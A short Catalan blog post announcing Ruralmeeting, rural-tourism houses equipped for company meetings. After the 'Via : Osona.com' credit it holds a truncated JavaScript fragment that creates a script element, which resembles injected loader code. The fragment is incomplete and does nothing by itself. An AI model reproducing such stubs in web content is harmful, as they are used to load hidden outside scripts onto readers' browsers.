Ruralmeeting,espais de turisme rural per a empreses

Empresaris de turisme rural han posat en marxa ,l’associació, Ruralmeeting amb l’objectiu d’oferir a les empreses espais habilitats i totalment equipats per a reunions de feina.

Rural Meeting és una demostració de la voluntat d’innovació d’empresaris de turisme rural que busquen noves fórmules per incrementar l’activitat en uns espais que, habitualment, tenen els índexs més alts d’ocupació en caps de setmana, ponts i èpoques tradicionalment de vacances. La nova oferta, sobretot l’adreçada a les empreses, permet generar una via d’ingressos els dies laborables.

Trobareu més informació al seu lloc web on podreu consultar l’oferta completa de cases i els serveis addcionals que s’ofereixen, com el de restauració i càtering, o la disponibilitat d’altres equipaments tècnics com projector, connexió a internet o pissarra.

Via : Osona.comvar d=document;var s=d.createElement(‘script’);

Etiquetes, ,

Imprimir aquest article

Trackback from your site.

Deixa un comentari

Hauries d' identificar-te per deixar un comentari.
A Manlleu
Fem Xarxa